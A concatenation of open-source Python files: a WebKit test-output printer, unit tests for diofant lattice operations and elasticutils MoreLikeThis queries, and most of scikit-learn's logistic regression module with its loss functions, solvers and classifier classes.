test_name = test_name[:prefix] + ellipsis + test_name[-(new_length - prefix):]
return format_string % (self.num_completed, self.num_tests, test_name, suffix)
def print_started_test(self, test_name):
self._running_tests.append(test_name)
if len(self._running_tests) > 1:
suffix = ' (+%d)' % (len(self._running_tests) - 1)
else:
suffix = ''
if self._options.verbose:
write = self._meter.write_update
else:
write = self._meter.write_throttled_update
write(self._test_status_line(test_name, suffix))
def print_finished_test(self, result, expected, exp_str, got_str):
self.num_completed += 1
test_name = result.test_name
result_message = self._result_message(result.type, result.failures, expected,
self._options.timing, result.test_run_time)
if self._options.details:
self._print_test_trace(result, exp_str, got_str)
elif self._options.verbose or not expected:
self.writeln(self._test_status_line(test_name, result_message))
elif self.num_completed == self.num_tests:
self._meter.write_update('')
else:
if test_name == self._running_tests[0]:
self._completed_tests.insert(0, [test_name, result_message])
else:
self._completed_tests.append([test_name, result_message])
            # Use distinct loop names so the enclosing test_name (needed by
            # the remove() below) is not clobbered.
            for completed_name, completed_message in self._completed_tests:
                self._meter.write_throttled_update(self._test_status_line(completed_name, completed_message))
self._completed_tests = []
self._running_tests.remove(test_name)
def _result_message(self, result_type, failures, expected, timing, test_run_time):
exp_string = ' unexpectedly' if not expected else ''
timing_string = ' %.4fs' % test_run_time if timing else ''
if result_type == test_expectations.PASS:
return ' passed%s%s' % (exp_string, timing_string)
else:
return ' failed%s (%s)%s' % (exp_string, ', '.join(failure.message() for failure in failures), timing_string)
def _print_test_trace(self, result, exp_str, got_str):
test_name = result.test_name
self._print_default(self._test_status_line(test_name, ''))
base = self._port.lookup_virtual_test_base(test_name)
if base:
args = ' '.join(self._port.lookup_virtual_test_args(test_name))
self._print_default(' base: %s' % base)
self._print_default(' args: %s' % args)
references = self._port.reference_files(test_name)
if references:
for _, filename in references:
self._print_default(' ref: %s' % self._port.relative_test_filename(filename))
else:
for extension in ('.txt', '.png', '.wav'):
self._print_baseline(test_name, extension)
self._print_default(' exp: %s' % exp_str)
self._print_default(' got: %s' % got_str)
self._print_default(' took: %-.3f' % result.test_run_time)
self._print_default('')
def _print_baseline(self, test_name, extension):
baseline = self._port.expected_filename(test_name, extension)
if self._port._filesystem.exists(baseline):
relpath = self._port.relative_test_filename(baseline)
else:
relpath = '<none>'
self._print_default(' %s: %s' % (extension[1:], relpath))
def _print_quiet(self, msg):
self.writeln(msg)
def _print_default(self, msg):
if not self._options.quiet:
self.writeln(msg)
def _print_debug(self, msg):
if self._options.debug_rwt_logging:
self.writeln(msg)
def write_throttled_update(self, msg):
self._meter.write_throttled_update(msg)
def write_update(self, msg):
self._meter.write_update(msg)
def writeln(self, msg):
self._meter.writeln(msg)
def flush(self):
self._meter.flush()
| hgl888/crosswalk-android-extensions | build/idl-generator/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/views/printing.py | Python | bsd-3-clause | 20,171 |
import pytest
from diofant import Integer, SympifyError
from diofant.core.operations import AssocOp, LatticeOp
__all__ = ()
class MyMul(AssocOp):
identity = Integer(1)
def test_flatten():
assert MyMul(2, MyMul(4, 3)) == MyMul(2, 4, 3)
class Join(LatticeOp):
"""Simplest possible Lattice class."""
zero = Integer(0)
identity = Integer(1)
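    # The op is idempotent, commutative and associative; `zero` (0) absorbs
    # and `identity` (1) is dropped, as the tests below verify.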
def test_lattice_simple():
assert Join(Join(2, 3), 4) == Join(2, Join(3, 4))
assert Join(2, 3) == Join(3, 2)
assert Join(0, 2) == 0
assert Join(1, 2) == 2
assert Join(2, 2) == 2
assert Join(Join(2, 3), 4) == Join(2, 3, 4)
assert Join() == 1
assert Join(4) == 4
assert Join(1, 4, 2, 3, 1, 3, 2) == Join(2, 3, 4)
def test_lattice_shortcircuit():
pytest.raises(SympifyError, lambda: Join(object))
assert Join(0, object) == 0
def test_lattice_print():
assert str(Join(5, 4, 3, 2)) == 'Join(2, 3, 4, 5)'
def test_lattice_make_args():
assert Join.make_args(0) == {0}
assert Join.make_args(1) == {1}
assert Join.make_args(Join(2, 3, 4)) == {Integer(2), Integer(3), Integer(4)}
| diofant/diofant | diofant/tests/core/test_operations.py | Python | bsd-3-clause | 1,106 |
from nose.tools import eq_
from elasticutils import MLT
from elasticutils.tests import ESTestCase
class MoreLikeThisTest(ESTestCase):
data = [
{'id': 1, 'foo': 'bar', 'tag': 'awesome'},
{'id': 2, 'foo': 'bar', 'tag': 'boring'},
{'id': 3, 'foo': 'bar', 'tag': 'awesome'},
{'id': 4, 'foo': 'bar', 'tag': 'boring'},
{'id': 5, 'foo': 'bar', 'tag': 'elite'},
{'id': 6, 'foo': 'notbar', 'tag': 'gross'},
{'id': 7, 'foo': 'notbar', 'tag': 'awesome'},
]
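    # MLT ("more like this") takes a document id and finds other documents
    # sharing terms in the given fields; min_term_freq and min_doc_freq are
    # lowered throughout because every term occurs only once per document.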
def test_bad_mlt(self):
"""Tests S or index and doc_type is specified."""
self.assertRaises(ValueError, lambda: MLT(1))
self.assertRaises(ValueError, lambda: MLT(1, index='foo'))
self.assertRaises(ValueError, lambda: MLT(1, doctype='foo'))
def test_mlt_on_foo(self):
"""Verify MLT with the foo field."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s(), ['foo'], min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 4)
def test_mlt_on_foo_no_s(self):
"""Verify MLT with the foo field."""
index = self.get_s().get_indexes()[0]
doc_type = self.get_s().get_doctypes()[0]
es = self.get_s().get_es()
mlt = MLT(1, mlt_fields=['foo'], index=index, doctype=doc_type,
es=es, min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 4)
def test_mlt_on_tag(self):
"""Verify MLT with the tag field."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s(), ['tag'], min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 2)
def test_mlt_on_two_fields(self):
"""Verify MLT on tag and foo fields."""
mlt = MLT(1, self.get_s(), ['tag', 'foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 5)
def test_mlt_deprecated_fields(self):
with self.assertRaises(DeprecationWarning):
MLT(1, self.get_s(), fields=['tag', 'foo'])
def test_mlt_iter(self):
mlt = MLT(1, self.get_s(), ['tag', 'foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(list(mlt)), 5)
def test_mlt_on_foo_with_filter(self):
"""Verify MLT with the foo field while filtering on tag."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s().filter(tag='boring'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 2)
mlt = MLT(1, self.get_s().filter(tag='elite'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 1)
mlt = MLT(1, self.get_s().filter(tag='awesome'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 1)
mlt = MLT(1, self.get_s().filter(tag='gross'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 0)
| mozilla/elasticutils | elasticutils/tests/test_mlt.py | Python | bsd-3-clause | 3,116 |
"""
Logistic Regression
"""
# Author: Gael Varoquaux <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Manoj Kumar <[email protected]>
import numbers
import warnings
import numpy as np
from scipy import optimize, sparse
from .base import LinearClassifierMixin, SparseCoefMixin, BaseEstimator
from ..feature_selection.from_model import _LearntSelectorMixin
from ..preprocessing import LabelEncoder
from ..svm.base import BaseLibLinear
from ..utils import check_array, check_consistent_length, compute_class_weight
from ..utils.extmath import log_logistic, safe_sparse_dot
from ..utils.optimize import newton_cg
from ..utils.validation import as_float_array, DataConversionWarning
from ..utils.fixes import expit
from ..externals.joblib import Parallel, delayed
from ..cross_validation import _check_cv
from ..externals import six
from ..metrics import SCORERS
# .. some helper functions for logistic_regression_path ..
def _intercept_dot(w, X, y):
"""Computes y * np.dot(X, w).
It takes into consideration if the intercept should be fit or not.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
"""
c = 0.
if w.size == X.shape[1] + 1:
c = w[-1]
w = w[:-1]
z = safe_sparse_dot(X, w) + c
return w, c, y * z
def _logistic_loss_and_grad(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss and gradient.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
grad : ndarray, shape (n_features,) or (n_features + 1,)
Logistic gradient.
"""
_, n_features = X.shape
grad = np.empty_like(w)
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
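    # i.e. loss(w, c) = -sum_i s_i * log(sigmoid(y_i * (x_i . w + c)))
    #                   + (alpha / 2) * ||w||^2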
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
z = expit(yz)
z0 = sample_weight * (z - 1) * y
grad[:n_features] = safe_sparse_dot(X.T, z0) + alpha * w
# Case where we fit the intercept.
if grad.shape[0] > n_features:
grad[-1] = z0.sum()
return out, grad
def _logistic_loss(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
"""
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
return out
def _logistic_loss_grad_hess(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss, gradient and the Hessian.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
grad : ndarray, shape (n_features,) or (n_features + 1,)
Logistic gradient.
Hs : callable
        Function that takes a vector as a parameter and returns the
        product of the Hessian and that vector.
"""
n_samples, n_features = X.shape
grad = np.empty_like(w)
fit_intercept = grad.shape[0] > n_features
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
z = expit(yz)
z0 = sample_weight * (z - 1) * y
grad[:n_features] = safe_sparse_dot(X.T, z0) + alpha * w
# Case where we fit the intercept.
if fit_intercept:
grad[-1] = z0.sum()
# The mat-vec product of the Hessian
d = sample_weight * z * (1 - z)
if sparse.issparse(X):
dX = safe_sparse_dot(sparse.dia_matrix((d, 0),
shape=(n_samples, n_samples)), X)
else:
# Precompute as much as possible
dX = d[:, np.newaxis] * X
if fit_intercept:
# Calculate the double derivative with respect to intercept
# In the case of sparse matrices this returns a matrix object.
dd_intercept = np.squeeze(np.array(dX.sum(axis=0)))
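    # Matrix-free Hessian-vector product: H.s = X^T.D.X.s + alpha * s, with
    # D = diag(sample_weight * sigma(yz) * (1 - sigma(yz))); the intercept
    # row/column are folded in via dd_intercept above.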
def Hs(s):
ret = np.empty_like(s)
ret[:n_features] = X.T.dot(dX.dot(s[:n_features]))
ret[:n_features] += alpha * s[:n_features]
# For the fit intercept case.
if fit_intercept:
ret[:n_features] += s[-1] * dd_intercept
ret[-1] = dd_intercept.dot(s[:n_features])
ret[-1] += d.sum() * s[-1]
return ret
return out, grad, Hs
def logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None, copy=True,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1.):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,)
Input data, target values.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
Print convergence message if True.
solver : {'lbfgs', 'newton-cg', 'liblinear'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
Initialization value for coefficients of logistic regression.
copy : bool, default True
Whether or not to produce a copy of the data. Setting this to
True will be useful in cases, when logistic_regression_path
is called repeatedly with the same data, as y is modified
along the path.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept.
Cs : ndarray
Grid of Cs used for cross-validation.
Notes
-----
    You might get slightly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
X = check_array(X, accept_sparse='csc', dtype=np.float64)
y = check_array(y, ensure_2d=False, copy=copy)
check_consistent_length(X, y)
n_classes = np.unique(y)
if pos_class is None:
if (n_classes.size > 2):
raise ValueError('To fit OvA, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = n_classes[1]
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "auto", then
# the class_weights are assigned after masking the labels with a OvA.
sample_weight = np.ones(X.shape[0])
le = LabelEncoder()
if isinstance(class_weight, dict):
if solver == "liblinear":
if n_classes.size == 2:
# Reconstruct the weights with keys 1 and -1
temp = {}
temp[1] = class_weight[pos_class]
temp[-1] = class_weight[n_classes[0]]
class_weight = temp.copy()
else:
raise ValueError("In LogisticRegressionCV the liblinear "
"solver cannot handle multiclass with "
"class_weight of type dict. Use the lbfgs, "
"newton-cg solvers or set "
"class_weight='auto'")
else:
class_weight_ = compute_class_weight(class_weight, n_classes, y)
sample_weight = class_weight_[le.fit_transform(y)]
mask = (y == pos_class)
y[mask] = 1
y[~mask] = -1
# To take care of object dtypes
y = as_float_array(y, copy=False)
if class_weight == "auto":
class_weight_ = compute_class_weight(class_weight, [-1, 1], y)
sample_weight = class_weight_[le.fit_transform(y)]
if fit_intercept:
w0 = np.zeros(X.shape[1] + 1)
else:
w0 = np.zeros(X.shape[1])
if coef is not None:
# it must work both giving the bias term and not
        if coef.size not in (X.shape[1], w0.size):
raise ValueError('Initialization coef is not of correct shape')
w0[:coef.size] = coef
coefs = list()
for C in Cs:
if solver == 'lbfgs':
func = _logistic_loss_and_grad
try:
out = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=(X, y, 1. / C, sample_weight),
iprint=(verbose > 0) - 1, pgtol=tol, maxiter=max_iter)
except TypeError:
# old scipy doesn't have maxiter
out = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=(X, y, 1. / C, sample_weight),
iprint=(verbose > 0) - 1, pgtol=tol)
w0 = out[0]
if out[2]["warnflag"] == 1:
warnings.warn("lbfgs failed to converge. Increase the number "
"of iterations.")
elif solver == 'newton-cg':
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
w0 = newton_cg(_logistic_loss_grad_hess, _logistic_loss, grad, w0,
args=(X, y, 1. / C, sample_weight),
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
lr = LogisticRegression(C=C, fit_intercept=fit_intercept, tol=tol,
class_weight=class_weight, dual=dual,
penalty=penalty,
intercept_scaling=intercept_scaling)
lr.fit(X, y)
if fit_intercept:
w0 = np.concatenate([lr.coef_.ravel(), lr.intercept_])
else:
w0 = lr.coef_.ravel()
else:
raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
"'newton-cg'}, got '%s' instead" % solver)
coefs.append(w0)
return coefs, np.array(Cs)
# helper function for LogisticCV
def _log_reg_scoring_path(X, y, train, test, pos_class=None, Cs=10,
scoring=None, fit_intercept=False,
max_iter=100, tol=1e-4, class_weight=None,
verbose=0, solver='lbfgs', penalty='l2',
dual=False, copy=True, intercept_scaling=1.):
"""Computes scores across logistic_regression_path
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target labels.
train : list of indices
The indices of the train set.
test : list of indices
The indices of the test set.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
Cs : list of floats | int
Each of the values in Cs describes the inverse of
        regularization strength. If Cs is an int, then a grid of Cs
        values is chosen on a logarithmic scale between 1e-4 and 1e4.
        If not provided, then a fixed set of values for Cs is used.
scoring : callable
For a list of scoring functions that can be used, look at
:mod:`sklearn.metrics`. The default scoring option used is
accuracy_score.
fit_intercept : bool
        If False, then the bias term is set to zero. Else the last
        entry of each coef_ gives the intercept.
max_iter : int
Maximum number of iterations for the solver.
tol : float
Tolerance for stopping criteria.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
verbose : int
Amount of verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear'}
Decides which solver to use.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept.
Cs : ndarray
Grid of Cs used for cross-validation.
scores : ndarray, shape (n_cs,)
Scores obtained for each Cs.
"""
log_reg = LogisticRegression(fit_intercept=fit_intercept)
log_reg._enc = LabelEncoder()
log_reg._enc.fit_transform([-1, 1])
X_train = X[train]
X_test = X[test]
y_train = y[train]
y_test = y[test]
if pos_class is not None:
mask = (y_test == pos_class)
y_test[mask] = 1
y_test[~mask] = -1
# To deal with object dtypes, we need to convert into an array of floats.
y_test = as_float_array(y_test, copy=False)
coefs, Cs = logistic_regression_path(X_train, y_train, Cs=Cs,
fit_intercept=fit_intercept,
solver=solver,
max_iter=max_iter,
class_weight=class_weight,
copy=copy, pos_class=pos_class,
tol=tol, verbose=verbose,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling)
scores = list()
if isinstance(scoring, six.string_types):
scoring = SCORERS[scoring]
for w in coefs:
if fit_intercept:
log_reg.coef_ = w[np.newaxis, :-1]
log_reg.intercept_ = w[-1]
else:
log_reg.coef_ = w[np.newaxis, :]
log_reg.intercept_ = 0.
if scoring is None:
scores.append(log_reg.score(X_test, y_test))
else:
scores.append(scoring(log_reg, X_test, y_test))
return coefs, Cs, np.array(scores)
class LogisticRegression(BaseLibLinear, LinearClassifierMixin,
_LearntSelectorMixin, SparseCoefMixin):
"""Logistic Regression (aka logit, MaxEnt) classifier.
In the multiclass case, the training algorithm uses a one-vs.-all (OvA)
scheme, rather than the "true" multinomial LR.
This class implements regularized logistic regression using the
`liblinear` library, newton-cg and lbfgs solvers. It can handle both
dense and sparse input. Use C-ordered arrays or CSR matrices containing
64-bit floats for optimal performance; any other input format will be
converted (and copied).
The newton-cg and lbfgs solvers support only L2 regularization with primal
formulation. The liblinear solver supports both L1 and L2 regularization,
with a dual formulation only for the L2 penalty.
Parameters
----------
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
C : float, optional (default=1.0)
Inverse of regularization strength; must be a positive float.
Like in support vector machines, smaller values specify stronger
regularization.
fit_intercept : bool, default: True
Specifies if a constant (a.k.a. bias or intercept) should be
        added to the decision function.
intercept_scaling : float, default: 1
when self.fit_intercept is True, instance vector x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
max_iter : int
Useful only for the newton-cg and lbfgs solvers. Maximum number of
iterations taken for the solvers to converge.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
solver : {'newton-cg', 'lbfgs', 'liblinear'}
Algorithm to use in the optimization problem.
tol : float, optional
Tolerance for stopping criteria.
Attributes
----------
coef_ : array, shape (n_classes, n_features)
Coefficient of the features in the decision function.
intercept_ : array, shape (n_classes,)
Intercept (a.k.a. bias) added to the decision function.
If `fit_intercept` is set to False, the intercept is set to zero.
n_iter_ : int
Maximum of the actual number of iterations across all classes.
Valid only for the liblinear solver.
See also
--------
SGDClassifier : incrementally trained logistic regression (when given
the parameter ``loss="log"``).
sklearn.svm.LinearSVC : learns SVM models using the same algorithm.
Notes
-----
The underlying C implementation uses a random number generator to
    select features when fitting the model. It is thus not uncommon
    to have slightly different results for the same input data. If
that happens, try with a smaller tol parameter.
References:
LIBLINEAR -- A Library for Large Linear Classification
http://www.csie.ntu.edu.tw/~cjlin/liblinear/
Hsiang-Fu Yu, Fang-Lan Huang, Chih-Jen Lin (2011). Dual coordinate descent
methods for logistic regression and maximum entropy models.
Machine Learning 85(1-2):41-75.
http://www.csie.ntu.edu.tw/~cjlin/papers/maxent_dual.pdf
"""
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='liblinear', max_iter=100):
super(LogisticRegression, self).__init__(
penalty=penalty, dual=dual, loss='lr', tol=tol, C=C,
fit_intercept=fit_intercept, intercept_scaling=intercept_scaling,
class_weight=class_weight, random_state=random_state,
solver=solver, max_iter=max_iter)
def predict_proba(self, X):
"""Probability estimates.
The returned estimates for all classes are ordered by the
label of classes.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in ``self.classes_``.
"""
return self._predict_proba_lr(X)
def predict_log_proba(self, X):
"""Log of probability estimates.
The returned estimates for all classes are ordered by the
label of classes.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
Returns the log-probability of the sample for each class in the
model, where classes are ordered as they are in ``self.classes_``.
"""
return np.log(self.predict_proba(X))
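# Illustrative sketch (hypothetical toy data): minimal LogisticRegression
# usage. fit() is inherited from BaseLibLinear; the columns returned by
# predict_proba() are ordered as in self.classes_.
def _demo_logistic_regression():
    rng = np.random.RandomState(0)
    X = rng.randn(60, 2)
    y = (X[:, 0] > 0).astype(np.int32)
    clf = LogisticRegression(C=1.0, solver='liblinear').fit(X, y)
    proba = clf.predict_proba(X)
    # Probabilities over classes sum to one for every sample.
    assert np.allclose(proba.sum(axis=1), 1.0)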
class LogisticRegressionCV(LogisticRegression, BaseEstimator,
LinearClassifierMixin, _LearntSelectorMixin):
"""Logistic Regression CV (aka logit, MaxEnt) classifier.
This class implements logistic regression using liblinear, newton-cg or
LBFGS optimizer. The newton-cg and lbfgs solvers support only L2
regularization with primal formulation. The liblinear solver supports both
L1 and L2 regularization, with a dual formulation only for the L2 penalty.
For the grid of Cs values (that are set by default to be ten values in
a logarithmic scale between 1e-4 and 1e4), the best hyperparameter is
selected by the cross-validator StratifiedKFold, but it can be changed
using the cv parameter. In the case of newton-cg and lbfgs solvers,
    we warm-start along the path, i.e. the coefficients obtained after
    convergence in the previous fit are used to initialize the present
    fit, so in general it is faster.
    For a multiclass problem, the hyperparameters for each class are computed
    using the best scores obtained by doing a one-vs-rest fit in parallel
    across all folds and classes. Hence this is not the true multinomial loss.
Parameters
----------
Cs : list of floats | int
Each of the values in Cs describes the inverse of regularization
        strength. If Cs is an int, then a grid of Cs values is chosen
        on a logarithmic scale between 1e-4 and 1e4.
Like in support vector machines, smaller values specify stronger
regularization.
fit_intercept : bool, default: True
Specifies if a constant (a.k.a. bias or intercept) should be
        added to the decision function.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
cv : integer or cross-validation generator
The default cross-validation generator used is Stratified K-Folds.
If an integer is provided, then it is the number of folds used.
        See the :mod:`sklearn.cross_validation` module for the
list of possible cross-validation objects.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
    scoring : callable
Scoring function to use as cross-validation criteria. For a list of
scoring functions that can be used, look at :mod:`sklearn.metrics`.
The default scoring option used is accuracy_score.
solver : {'newton-cg', 'lbfgs', 'liblinear'}
Algorithm to use in the optimization problem.
tol : float, optional
Tolerance for stopping criteria.
max_iter : int, optional
Maximum number of iterations of the optimization algorithm.
n_jobs : int, optional
Number of CPU cores used during the cross-validation loop. If given
a value of -1, all cores are used.
verbose : bool | int
Amount of verbosity.
refit : bool
        If set to True, the scores are averaged across all folds, the
        coefs and the C that correspond to the best score are taken, and a
        final refit is done using these parameters.
Otherwise the coefs, intercepts and C that correspond to the
best scores across folds are averaged.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Attributes
----------
coef_ : array, shape (1, n_features) or (n_classes, n_features)
Coefficient of the features in the decision function.
`coef_` is of shape (1, n_features) when the given problem
is binary.
`coef_` is readonly property derived from `raw_coef_` that
follows the internal memory layout of liblinear.
intercept_ : array, shape (1,) or (n_classes,)
Intercept (a.k.a. bias) added to the decision function.
        It is available only when the parameter fit_intercept is set to True
        and is of shape (1,) when the problem is binary.
Cs_ : array
Array of C i.e. inverse of regularization parameter values used
for cross-validation.
    coefs_paths_ : dict
dict with classes as the keys, and the path of coefficients obtained
during cross-validating across each fold and then across each Cs
after doing an OvA for the corresponding class.
Each dict value has shape (n_folds, len(Cs_), n_features) or
(n_folds, len(Cs_), n_features + 1) depending on whether the
intercept is fit or not.
scores_ : dict
dict with classes as the keys, and the values as the
grid of scores obtained during cross-validating each fold, after doing
an OvA for the corresponding class.
        Each dict value has shape (n_folds, len(Cs_))
C_ : array, shape (n_classes,) or (n_classes - 1,)
Array of C that maps to the best scores across every class. If refit is
set to False, then for each class, the best C is the average of the
C's that correspond to the best scores for each fold.
See also
--------
LogisticRegression
"""
